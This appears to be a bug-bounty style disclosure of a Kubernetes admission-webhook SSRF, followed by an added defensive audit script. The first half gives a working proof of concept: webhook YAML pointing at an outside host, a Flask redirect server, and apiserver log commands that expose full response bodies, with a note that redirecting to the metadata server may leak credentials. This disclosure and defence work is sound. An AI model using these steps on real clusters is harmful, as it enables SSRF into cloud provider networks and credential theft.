Report Submission Form
An attacker who can create an admission webhook configuration can make the kube-apiserver send HTTP requests to a server of the attacker's choice. On managed cloud offerings such as GKE, AKS and EKS the apiserver runs inside the provider's infrastructure, so this is an SSRF into the cloud provider's network.
1.test environment
kubernetes v1.18.6
Docker version 19.03.6, build 369ce74a3c
minikube start --vm-driver=none --kubernetes-version='v1.18.6'
2.edit the kube-apiserver options in the static pod manifest at
/etc/kubernetes/manifests/kube-apiserver.yaml
and add the following flags to the spec.containers.command field (see pic1). They make the apiserver write its log files to /var/log, the directory that the apiserver's /logs endpoint serves, so the log can be read later over the API.
--log-dir=/var/log
--logtostderr=false
{F920720}
3.save the following yaml to disk as poc1.yaml and run kubectl create -f poc1.yaml
poc1.yaml
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: test.config.xxx.io
webhooks:
  - name: test.config.xxx.io
    rules:
      - apiGroups: [""]
        apiVersions: ["v1", "v1beta1"]
        operations: ["CREATE", "DELETE", "UPDATE"]
        resources: ["serviceaccounts"]
        scope: "*"
    clientConfig:
      # modify with your poc2 webserver
      url: "https://lazydog.me/aa"
      # if the webserver uses a self-signed certificate, caBundle must be added
      # caBundle: ""
    admissionReviewVersions: ["v1", "v1beta1"]
    sideEffects: None
    timeoutSeconds: 5
4.install Flask with pip install Flask, save the Python below as poc1.py and start it with FLASK_ENV=development FLASK_APP=poc1 flask run
. The webhook URL is https, so if the server uses a self-signed certificate add --cert PATH --key PATH to the command (and put the CA in caBundle above). The server must be reachable from the apiserver at the host named in clientConfig.url.
from flask import Flask, redirect, request, Response

app = Flask(__name__)
# the listening port comes from `flask run --port`; setting app.port has no effect


@app.route('/<path:path>', methods=['POST', 'GET'])
def index(path=''):
    # print the apiserver's request headers to show the AdmissionReview POST arriving
    print(request.headers)
    if path == 'test':
        # direct (non-redirect) answer, for comparison
        res = Response("test")
        res.headers["Content-Type"] = "application/vnd.kubernetes.protobuf"
        return res
    # redirect the apiserver to another host; the apiserver follows it and logs the body
    return redirect('http://www.tencent.com/')
5.run kubectl proxy &
to expose the apiserver on localhost:8001, then raise the klog verbosity to 10 with the command below. Without level 10 the log only contains the response body of failed HTTP responses (non-2xx status codes).
curl -XPUT --data "10" http://localhost:8001/debug/flags/v
6.now create a serviceaccount, which matches the webhook rule and makes the apiserver call our evil web server: kubectl create sa testpoc
{F920762}
7.fetch the apiserver log with curl http://localhost:8001/logs/kube-apiserver.INFO
and search for the Response Body:
marker; the full body returned by the redirect target follows it.
{F920768}
I think this case is like CVE-2020-8555
: an attacker can cause a full-response-body SSRF against inner servers of the cloud provider.
If the redirect URL is the metadata server, it may leak credentials or other sensitive information.
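The check a cluster operator would want after reading the steps above is an audit of every admission webhook whose clientConfig uses a url rather than an in-cluster service, since that is the configuration the apiserver connects out to. The following Python is an added example written for this report, not code from the original submission or from Kubernetes; the webhook list it parses is constructed by hand in the shape of kubectl's JSON List output, and the configuration names and URLs in it are hypothetical. Because the report shows the apiserver following a redirect from the configured host, the script flags every url-based webhook, and additionally calls out URLs that already point at the metadata endpoint or at private/link-local addresses.

```python
"""Audit admission webhook configurations for clientConfig.url targets that
turn the kube-apiserver into an SSRF proxy (added example for this report)."""
import ipaddress
import json
from urllib.parse import urlparse

# Constructed sample input (hypothetical names and URLs), trimmed to the fields
# the check reads. Real input: kubectl get validatingwebhookconfigurations,\
# mutatingwebhookconfigurations -o json
SAMPLE_WEBHOOK_LIST = json.dumps({
    "kind": "List",
    "items": [
        {
            "kind": "ValidatingWebhookConfiguration",
            "metadata": {"name": "test.config.xxx.io"},
            "webhooks": [
                {"name": "test.config.xxx.io",
                 "clientConfig": {"url": "https://lazydog.me/aa"}},
            ],
        },
        {
            "kind": "MutatingWebhookConfiguration",
            "metadata": {"name": "metadata-probe.example.io"},
            "webhooks": [
                {"name": "metadata-probe.example.io",
                 "clientConfig": {"url": "http://169.254.169.254/computeMetadata/v1/"}},
            ],
        },
        {
            "kind": "ValidatingWebhookConfiguration",
            "metadata": {"name": "in-cluster.example.io"},
            "webhooks": [
                {"name": "in-cluster.example.io",
                 "clientConfig": {"service": {"namespace": "webhooks",
                                              "name": "validator",
                                              "path": "/validate"}}},
            ],
        },
    ],
})

# Hostnames that cloud metadata services answer on (the link-local IP is shared
# by GCE, AWS and Azure; the DNS name is GCE's).
METADATA_HOSTNAMES = {"169.254.169.254", "metadata.google.internal"}

URL_BASED = "url-based clientConfig (apiserver egress, redirects followed)"


def classify_url(url):
    """Return the reasons a webhook URL is risky; URL-based is always one of them."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []
    if parsed.scheme != "https":
        reasons.append("non-https url")
    if host in METADATA_HOSTNAMES:
        reasons.append("targets cloud metadata endpoint")
    else:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            ip = None  # a DNS name; it can resolve anywhere, including back into the VPC
        if ip is not None:
            if ip.is_link_local:
                reasons.append("link-local address (metadata range)")
            elif ip.is_private or ip.is_loopback:
                reasons.append("private or loopback address")
    # Any url-based webhook makes the apiserver connect to a host chosen by the
    # configuration author, and the configured host can redirect it elsewhere.
    reasons.append(URL_BASED)
    return reasons


def audit_webhooks(webhook_list_json):
    """Return one finding per url-based webhook in a kubectl JSON List."""
    findings = []
    for item in json.loads(webhook_list_json)["items"]:
        for hook in item.get("webhooks", []):
            url = hook.get("clientConfig", {}).get("url")
            if url is None:
                continue  # service-based: resolved to an in-cluster Service, not flagged
            findings.append({
                "kind": item["kind"],
                "config": item["metadata"]["name"],
                "webhook": hook["name"],
                "url": url,
                "reasons": classify_url(url),
            })
    return findings


if __name__ == "__main__":
    for f in audit_webhooks(SAMPLE_WEBHOOK_LIST):
        print(f"{f['kind']}/{f['config']} webhook {f['webhook']} -> {f['url']}")
        for reason in f["reasons"]:
            print("   -", reason)
```

Run against a live cluster by replacing SAMPLE_WEBHOOK_LIST with the output of kubectl get validatingwebhookconfigurations,mutatingwebhookconfigurations -o json. The sample produces two findings (the lazydog.me webhook and the metadata probe) and none for the service-based configuration; the script deliberately does not try to resolve DNS names, because a name that looks external today can be repointed at an internal address later.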